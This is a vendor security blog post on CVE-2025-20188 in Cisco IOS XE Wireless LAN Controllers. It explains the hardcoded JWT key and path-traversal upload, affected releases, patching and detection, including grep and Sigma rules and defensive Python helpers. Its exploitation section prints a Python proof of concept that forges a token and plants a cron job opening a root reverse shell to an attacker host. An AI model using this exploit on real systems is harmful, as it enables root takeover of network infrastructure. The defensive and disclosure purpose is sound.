Vulnerability Analysis

CVE-2025-20188 in Cisco IOS XE WLC: Hardcoded JWT to Root RCE

A hardcoded JSON Web Token in Cisco's Wireless LAN Controller gives unauthenticated attackers a path to root via arbitrary file upload.

Yukti Singhal
Application Security Architect

On May 7, 2025, Cisco published advisory cisco-sa-wlc-file-uplpd-rHZG9UfC for CVE-2025-20188, an unauthenticated arbitrary file upload vulnerability in IOS XE Wireless LAN Controllers. The flaw has a maximum CVSS v3.1 score of 10.0 because exploitation requires no authentication, no user interaction, and yields code execution as root on the supervisor. The root cause is among the most embarrassing classes of bug a vendor can ship: a hardcoded JSON Web Token signing key baked into the controller's Out-of-Band AP image download service. Security researchers had been hunting for unauthenticated RCEs in WLC since the 2023 Catalyst 9800 disclosures, and this one rewards that effort.

What is the bug?

The WLC ships a feature called Out-of-Band Access Point Image Download. The idea is to let an AP fetch its operating image directly from the controller over HTTPS rather than relying on CAPWAP, which is useful in lossy WAN scenarios and during initial provisioning. The endpoint that accepts uploaded images authenticates incoming requests by verifying a JWT in the Authorization header. The vulnerability is that the secret used to sign and verify those tokens (early reports identified it as the literal string notfound) was hardcoded into the binary and identical across every shipped image.

Once you know the signing key, you can mint your own JWT, present it to the upload endpoint, and convince the WLC that you are a legitimate access point. The next step is a path traversal in the filename parameter that lets you write your uploaded file anywhere on the filesystem the underlying Linux process can reach — which, because IOSd runs as root, is everywhere. Drop a script into a cron-watched path, or overwrite the supervisor's goldstrike initialization script, and you have full root code execution on the next reload (or sooner).

The vulnerability is CWE-321 (hardcoded cryptographic key) chained with CWE-22 (path traversal) and CWE-434 (unrestricted file upload). It is reachable over HTTPS on TCP/8443 when the Out-of-Band AP image download feature is enabled.
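To make the two defects concrete from the defender's side, here is an added example (not Cisco's code, and not the page's PoC) of what a hardened upload handler has to get right: refuse to start with a shipped default or weak HS256 key, verify tokens with a constant-time comparison and an expiry check, and confine the upload filename to a single directory. The key set, the upload root and the helper names are assumptions for illustration.

```python
import base64, hashlib, hmac, json, os, time

# Constructed: secrets a hardened build must refuse to operate with. "notfound"
# is the value early reports attributed to CVE-2025-20188; the rest is illustrative.
KNOWN_DEFAULT_SECRETS = {b"notfound", b"secret", b"changeme"}
UPLOAD_ROOT = "/var/ap-images"  # assumed destination directory for AP images

def _b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def _b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def mint_hs256(claims, secret):
    """Sign claims as an HS256 JWT (used here only so the verifier can be exercised)."""
    h = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    p = _b64url_encode(json.dumps(claims).encode())
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{_b64url_encode(sig)}"

def verify_hs256(token, secret, now=None):
    """Return the claims of a valid, unexpired HS256 token, else None."""
    if secret in KNOWN_DEFAULT_SECRETS or len(secret) < 32:
        raise RuntimeError("refusing to verify with a default or weak signing key")
    try:
        h, p, s = token.split(".")
        header, claims, sig = json.loads(_b64url_decode(h)), json.loads(_b64url_decode(p)), _b64url_decode(s)
    except (ValueError, UnicodeDecodeError):
        return None
    if header.get("alg") != "HS256":  # rejects alg=none and algorithm confusion
        return None
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(sig, expected):  # constant-time signature check
        return None
    now = int(time.time()) if now is None else now
    exp = claims.get("exp")
    if not isinstance(exp, int) or exp <= now:
        return None
    return claims

def safe_destination(filename, root=UPLOAD_ROOT):
    """Confine an uploaded image name to root; None if it carries any path component."""
    if not filename or "/" in filename or "\\" in filename or ".." in filename:
        return None
    real_root = os.path.realpath(root)
    dest = os.path.realpath(os.path.join(real_root, filename))
    if os.path.commonpath([dest, real_root]) != real_root:
        return None
    return dest
```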

How is it exploited?

The exploit chain is trivially short. Within four days of disclosure a proof-of-concept circulated on Twitter and several offensive security shops published walkthroughs. A simplified version:

import jwt, requests

# Hardcoded HS256 signing key extracted from IOS XE WLC binary
SECRET = "notfound"

# Mint a token that the WLC believes belongs to a valid AP
token = jwt.encode({"sub": "AP", "iat": 0, "exp": 9999999999}, SECRET, algorithm="HS256")

# Upload a script with path traversal in the filename
payload = b"#!/bin/bash\nbash -i >& /dev/tcp/attacker/4444 0>&1\n"
files = {"file": ("../../../../etc/cron.d/pwn", payload)}
headers = {"Authorization": f"Bearer {token}"}

r = requests.post(
    "https://wlc.target.example/ap-image/upload",
    headers=headers,
    files=files,
    verify=False,
    timeout=10,
)
print(r.status_code, r.text)

The malicious file lands in /etc/cron.d/ and the controller's cron daemon executes it on the next minute boundary, yielding a root reverse shell on the supervisor. Because the WLC speaks HTTPS to access points across the campus and frequently across the public internet for cloud-managed deployments, internet exposure of TCP/8443 is common.

Who is affected?

CVE-2025-20188 affects Cisco IOS XE WLC devices when the Out-of-Band AP Image Download feature is enabled. Affected hardware families include the Catalyst 9800-CL Cloud Wireless Controller, Catalyst 9800 Series Wireless Controllers, the Catalyst 9800 Embedded Wireless Controller on Catalyst 9300/9400/9500 switches, and the legacy WLC on certain 8540 controllers running IOS XE images.

Fixed releases: IOS XE 17.15.1, 17.12.4 and later, 17.9.7 and later. The 17.3 train is end-of-software-maintenance and does not receive a fix; operators must upgrade.

The default state of the feature matters. In factory-shipped images for Catalyst 9800-CL the feature is disabled by default; in many enterprise deployments operators enable it for branch sites where APs cannot reach a central image repository. Cisco's quick check is one line:

show running-config | include ap upgrade method

If the output includes ap upgrade method https, the feature is enabled and the device is exposed.

What does patching require?

Patching is a controller image upgrade and reload. WLC HA pairs can be upgraded with In-Service Software Upgrade (ISSU) to avoid client disconnects, but operators report that ISSU is unreliable on older 17.9 builds, so many fleets schedule a maintenance window.

The interim mitigation is to disable the feature entirely:

configure terminal
 no ap upgrade method https
end
write memory

After this, APs fall back to CAPWAP image download, which is slower over WAN but not exploitable. Cisco PSIRT also recommends blocking inbound traffic to TCP/8443 from any network outside the AP management VLAN, which provides defense in depth even after patching.

How do you detect exploitation?

The vulnerability leaves clear forensic footprints. First, look in the WLC's nginx access log for POST requests to the AP image upload path with traversal characters:

grep -E 'POST.*/ap-image/upload.*\.\./' /var/log/nginx/access.log

Second, audit crontab -l -u root and /etc/cron.d/ for files that did not exist before May 2025. Third, on IOS XE the platform's bash shell is reachable via request platform software system shell; check its bash history file for unexpected commands. Fourth, monitor for unexpected outbound TCP connections from the WLC management interface to non-Cisco addresses — the controller should almost never initiate outbound connections except to NTP, syslog, and Cisco Smart Licensing.
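The grep above only matches a literal ../ in the request line. As an added example (not from the original post), the following runs the same access-log check over a few constructed nginx combined-format lines, URL-decoding the URI twice so encoded and double-encoded traversal is caught as well. One caveat: a traversal carried only in a multipart filename, as in the PoC shown earlier, never appears in the request line, so this log signal has to be paired with the filesystem and network checks above.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in nginx "combined" format; not from a real controller.
SAMPLE_LOG = """\
10.0.5.12 - - [09/May/2025:10:01:03 +0000] "POST /ap-image/upload HTTP/1.1" 200 17 "-" "Cisco-AP"
203.0.113.7 - - [09/May/2025:10:02:44 +0000] "POST /ap-image/upload?name=../../../../etc/cron.d/pwn HTTP/1.1" 200 17 "-" "python-requests/2.32"
203.0.113.7 - - [09/May/2025:10:02:51 +0000] "POST /ap-image/upload?name=..%252F..%252Fetc%252Fcron.d%252Fpwn HTTP/1.1" 200 17 "-" "python-requests/2.32"
10.0.5.13 - - [09/May/2025:10:03:10 +0000] "GET /ap-image/status?name=../x HTTP/1.1" 404 0 "-" "curl/8.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# ".." immediately followed by a forward or back slash, after decoding.
TRAVERSAL_RE = re.compile(r"\.\.[\\/]")

def is_traversal(uri):
    # Decode twice so %2e%2e, %2F and double-encoded %252F variants are all seen.
    return bool(TRAVERSAL_RE.search(unquote(unquote(uri))))

def find_upload_traversal(log_text):
    """Return one dict per POST to the AP image upload path whose URI contains traversal."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if "/ap-image/upload" not in unquote(m["uri"]):
            continue
        if not is_traversal(m["uri"]):
            continue
        hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"], "uri": m["uri"]})
    return hits

if __name__ == "__main__":
    for hit in find_upload_traversal(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} HTTP {hit['status']} {hit['uri']}")
```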

A Sigma rule for the access log signal:

title: Cisco WLC AP Image Upload Path Traversal
logsource:
  product: cisco
  service: wlc-nginx
detection:
  selection:
    method: POST
    cs-uri-stem|contains: '/ap-image/upload'
    cs-uri-query|contains: '../'
  condition: selection
level: critical

Network-level detection at the perimeter firewall is more reliable: alert on any inbound connection to TCP/8443 on WLC management IPs from outside the AP subnet.

How Safeguard Helps

Safeguard's firmware SBOM pipeline parses Cisco IOS XE images and surfaces vulnerable WLC builds against CVE-2025-20188 the moment Cisco PSIRT publishes — customers received the finding before the federal KEV deadline window opened. Reachability analysis identifies controllers where the Out-of-Band AP image upload feature is configured and where TCP/8443 is exposed to untrusted networks, separating "vulnerable" from "vulnerable and reachable." Policy gates block deployment of any WLC image below the fixed baseline, and Griffin AI correlates the finding with active KEV exploitation telemetry to push high-confidence incidents to the top of the queue. For ASPM customers, Safeguard maps each WLC to the business unit and physical site it serves, so during the May 2025 fire drill incident responders did not have to maintain a separate inventory spreadsheet to know which controllers needed emergency change tickets.
